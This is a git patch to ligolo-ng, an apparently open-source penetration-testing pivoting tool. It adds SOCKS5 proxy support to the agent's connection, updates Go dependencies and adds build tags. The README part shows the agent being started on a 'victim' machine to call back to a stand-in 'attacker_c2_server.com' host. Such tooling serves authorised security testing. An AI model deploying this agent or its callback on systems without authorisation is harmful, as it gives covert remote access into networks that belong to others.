From 091996f6c951d925e093c4cfa30e065b1d8ff10f Mon Sep 17 00:00:00 2001 From: Nicolas Chatelain Date: Fri, 26 Nov 2021 17:35:25 +0100 Subject: [PATCH] Fix compatibility with wintun > 0.14 (#8), add SOCKS5 support (#7), use Go 1.17 --- README.md | 4 +- cmd/agent/main.go | 56 +++++++++++++++++++------- go.mod | 31 ++++++++++++-- go.sum | 18 +++++++++ pkg/agent/neterror/neterror_unix.go | 1 + pkg/proxy/netstack/tun/gvisor.go | 1 + pkg/proxy/netstack/tun/wireguard.go | 1 + pkg/proxy/netstack/tun/wireguard_ep.go | 2 + 8 files changed, 94 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index ce5b68b..68b68cf 100644 --- a/README.md +++ b/README.md @@ -78,7 +78,7 @@ This allows running tools like *nmap* without the use of *proxychains* (simpler Precompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/tnpitsecurity/ligolo-ng/releases). ### Building Ligolo-ng -Building *ligolo-ng*: +Building *ligolo-ng* (Go >= 1.17 is required): ```shell $ go build -o agent cmd/agent/main.go @@ -140,6 +140,8 @@ Start the *agent* on your target (victim) computer (no privileges are required!) $ ./agent -connect attacker_c2_server.com:11601 ``` +> If you want to tunnel the connection over a SOCKS5 proxy, you can use the `--socks ip:port` option. You can specify SOCKS credentials using the `--socks-user` and `--socks-pass` arguments. + A session should appear on the *proxy* server. ``` diff --git a/cmd/agent/main.go b/cmd/agent/main.go index 57a72ef..f3651ec 100644 --- a/cmd/agent/main.go +++ b/cmd/agent/main.go @@ -8,6 +8,7 @@ import ( "fmt" "github.com/hashicorp/yamux" "github.com/sirupsen/logrus" + goproxy "golang.org/x/net/proxy" "ligolo-ng/pkg/agent/neterror" "ligolo-ng/pkg/agent/smartping" "ligolo-ng/pkg/protocol" @@ -25,11 +26,14 @@ var connTrackID int32 var listenerID int32 func main() { + var tlsConfig tls.Config var ignoreCertificate = flag.Bool("ignore-cert", false, "ignore TLS certificate validation (dangerous), only for debug purposes") var verbose = flag.Bool("v", false, "enable verbose mode") var retry = flag.Bool("retry", false, "auto-retry on error") - - var serverAddr = flag.String("connect", "", "the target domain:port") + var socksProxy = flag.String("socks", "", "socks5 proxy address (ip:port)") + var socksUser = flag.String("socks-user", "", "socks5 username") + var socksPass = flag.String("socks-pass", "", "socks5 password") + var serverAddr = flag.String("connect", "", "the target (domain:port)") flag.Parse() @@ -42,11 +46,38 @@ func main() { if *serverAddr == "" { logrus.Fatal("please, specify the target host user -connect host:port") } - if _, _, err := net.SplitHostPort(*serverAddr); err != nil { - logrus.Fatal("invalid connect address, please using host:port") + host, _, err := net.SplitHostPort(*serverAddr) + if err != nil { + logrus.Fatal("invalid connect address, please use host:port") + } + tlsConfig.ServerName = host + + var conn net.Conn + + if *socksProxy != "" { + if _, _, err := net.SplitHostPort(*socksProxy); err != nil { + logrus.Fatal("invalid socks5 address, please use host:port") + } + + proxyDialer, err := goproxy.SOCKS5("tcp", *socksProxy, &goproxy.Auth{ + User: *socksUser, + Password: *socksPass, + }, goproxy.Direct) + if err != nil { + logrus.Fatalf("socks5 error: %v", err) + } + conn, err = proxyDialer.Dial("tcp", *serverAddr) + if err != nil { + logrus.Fatalf("socks5 dial error: %v", err) + } + } else { + var err error + conn, err = net.Dial("tcp", *serverAddr) + if err != nil { + logrus.Fatalf("dial error: %v", err) + } } - var tlsConfig tls.Config if *ignoreCertificate { logrus.Warn("warning, certificate validation disabled") tlsConfig.InsecureSkipVerify = true @@ -55,9 +86,8 @@ func main() { listenerConntrack = make(map[int32]net.Conn) listenerMap = make(map[int32]net.Listener) - for { - err := connect(*serverAddr, &tlsConfig) + err := connect(conn, &tlsConfig) logrus.Errorf("Connection error: %v", err) if *retry { logrus.Info("Retrying in 5 seconds.") @@ -68,19 +98,15 @@ func main() { } } -func connect(addr string, config *tls.Config) error { - - dialer, err := tls.Dial("tcp", addr, config) - if err != nil { - return err - } +func connect(conn net.Conn, config *tls.Config) error { + tlsConn := tls.Client(conn, config) - yamuxConn, err := yamux.Server(dialer, yamux.DefaultConfig()) + yamuxConn, err := yamux.Server(tlsConn, yamux.DefaultConfig()) if err != nil { return err } - logrus.WithFields(logrus.Fields{"addr": dialer.RemoteAddr()}).Info("Connection established") + logrus.WithFields(logrus.Fields{"addr": tlsConn.RemoteAddr()}).Info("Connection established") for { conn, err := yamuxConn.Accept() diff --git a/go.mod b/go.mod index 45437b3..feb5259 100644 --- a/go.mod +++ b/go.mod @@ -1,6 +1,6 @@ module ligolo-ng -go 1.16 +go 1.17 require ( github.com/AlecAivazis/survey/v2 v2.2.15 @@ -9,8 +9,31 @@ require ( github.com/hashicorp/yamux v0.0.0-20210707203944-259a57b3608c github.com/jedib0t/go-pretty/v6 v6.2.4 github.com/sirupsen/logrus v1.8.1 - golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 - golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect - golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c + golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa + golang.org/x/net v0.0.0-20211111083644-e5c967477495 + golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224 // indirect + golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16 gvisor.dev/gvisor v0.0.0-20210923032606-0801d469950e ) + +require ( + github.com/desertbit/closer/v3 v3.1.2 // indirect + github.com/desertbit/columnize v2.1.0+incompatible // indirect + github.com/desertbit/go-shlex v0.1.1 // indirect + github.com/desertbit/readline v1.5.1 // indirect + github.com/fatih/color v1.10.0 // indirect + github.com/google/btree v1.0.1 // indirect + github.com/hashicorp/errwrap v1.1.0 // indirect + github.com/hashicorp/go-multierror v1.1.0 // indirect + github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect + github.com/mattn/go-colorable v0.1.8 // indirect + github.com/mattn/go-isatty v0.0.12 // indirect + github.com/mattn/go-runewidth v0.0.9 // indirect + github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect + golang.org/x/sync v0.0.0-20210220032951-036812b2e83c // indirect + golang.org/x/sys v0.0.0-20211110154304-99a53858aa08 // indirect + golang.org/x/term v0.0.0-20210503060354-a79de5458b56 // indirect + golang.org/x/text v0.3.6 // indirect + golang.org/x/time v0.0.0-20191024005414-555d28b269f0 // indirect + golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d // indirect +) diff --git a/go.sum b/go.sum index 4008e9f..8a6ac3b 100644 --- a/go.sum +++ b/go.sum @@ -623,6 +623,8 @@ golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201002170205-7f63de1d35b0/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 h1:/ZScEX8SfEmUGRHs0gxpqteO5nfNW6axyZbBdw9A12g= golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= +golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa h1:idItI2DDfCokpg0N51B2VtiLdJ4vAuXC9fnCb2gACo4= +golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= @@ -702,6 +704,8 @@ golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 h1:qWPm9rbaAMKs8Bq/9LRpbMqxWRVUAQwMI9fVrssnTfw= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20211111083644-e5c967477495 h1:cjxxlQm6d4kYbhpZ2ghvmI8xnq0AG+jXmzrhzfkyu5A= +golang.org/x/net v0.0.0-20211111083644-e5c967477495/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -797,8 +801,14 @@ golang.org/x/sys v0.0.0-20210220050731-9a76102bfb43/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20210305230114-8fe3ee5dd75b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210314195730-07df6a141424/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20211103235746-7861aae1554b h1:1VkfZQv42XQlA/jchYumAnv1UPo6RgF9rJFkTgZIxO4= +golang.org/x/sys v0.0.0-20211103235746-7861aae1554b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20211110154304-99a53858aa08 h1:WecRHqgE09JBkh/584XIE6PMz5KKE/vER4izNUi30AQ= +golang.org/x/sys v0.0.0-20211110154304-99a53858aa08/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210503060354-a79de5458b56 h1:b8jxX3zqjpqb2LklXPzKSGJhzyxCOZSz8ncv8Nv+y7w= @@ -812,6 +822,8 @@ golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.5 h1:i6eZZ+zk0SOf0xgBpEpPD18qWcJda6q1sxt3S0kzyUQ= golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20180412165947-fbb02b2291d2/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= @@ -874,8 +886,14 @@ golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8T golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d h1:9+v0G0naRhLPOJEeJOL6NuXTtAHHwmkyZlgQJ0XcQ8I= +golang.zx2c4.com/go118/netip v0.0.0-20211111135330-a4a02eeacf9d/go.mod h1:5yyfuiqVIJ7t+3MqrpTQ+QqRkMWiESiyDvPNvKYCecg= +golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224 h1:Ug9qvr1myri/zFN6xL17LSCBGFDnphBBhzmILHsM5TY= +golang.zx2c4.com/wintun v0.0.0-20211104114900-415007cec224/go.mod h1:deeaetjYA+DHMHg+sMSMI58GrEteJUUzzw7en6TJQcI= golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c h1:IsAez/yRA23H/i9A02IHbYnmtVOs7DsP3aVP2cu5SNE= golang.zx2c4.com/wireguard v0.0.0-20210905140043-2ef39d47540c/go.mod h1:laHzsbfMhGSobUmruXWAyMKKHSqvIcrqZJMyHD+/3O8= +golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16 h1:SCBV/ayxt56AuC0R8oN5p8Mmc9Llv34tr9VbNlh1kL0= +golang.zx2c4.com/wireguard v0.0.0-20211123210315-387f7c461a16/go.mod h1:TjUWrnD5ATh7bFvmm/ALEJZQ4ivKbETb6pmyj1vUoNI= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= diff --git a/pkg/agent/neterror/neterror_unix.go b/pkg/agent/neterror/neterror_unix.go index 68e1141..836cae4 100644 --- a/pkg/agent/neterror/neterror_unix.go +++ b/pkg/agent/neterror/neterror_unix.go @@ -1,3 +1,4 @@ +//go:build aix || darwin || dragonfly || freebsd || linux || netbsd || openbsd || solaris // +build aix darwin dragonfly freebsd linux netbsd openbsd solaris package neterror diff --git a/pkg/proxy/netstack/tun/gvisor.go b/pkg/proxy/netstack/tun/gvisor.go index 9a9dca0..f3edbdf 100644 --- a/pkg/proxy/netstack/tun/gvisor.go +++ b/pkg/proxy/netstack/tun/gvisor.go @@ -1,3 +1,4 @@ +//go:build !windows // +build !windows package tun diff --git a/pkg/proxy/netstack/tun/wireguard.go b/pkg/proxy/netstack/tun/wireguard.go index 85a6a1a..d3000c3 100644 --- a/pkg/proxy/netstack/tun/wireguard.go +++ b/pkg/proxy/netstack/tun/wireguard.go @@ -1,3 +1,4 @@ +//go:build !linux // +build !linux package tun diff --git a/pkg/proxy/netstack/tun/wireguard_ep.go b/pkg/proxy/netstack/tun/wireguard_ep.go index ac1f594..273200f 100644 --- a/pkg/proxy/netstack/tun/wireguard_ep.go +++ b/pkg/proxy/netstack/tun/wireguard_ep.go @@ -1,4 +1,6 @@ +//go:build !linux // +build !linux + package tun import (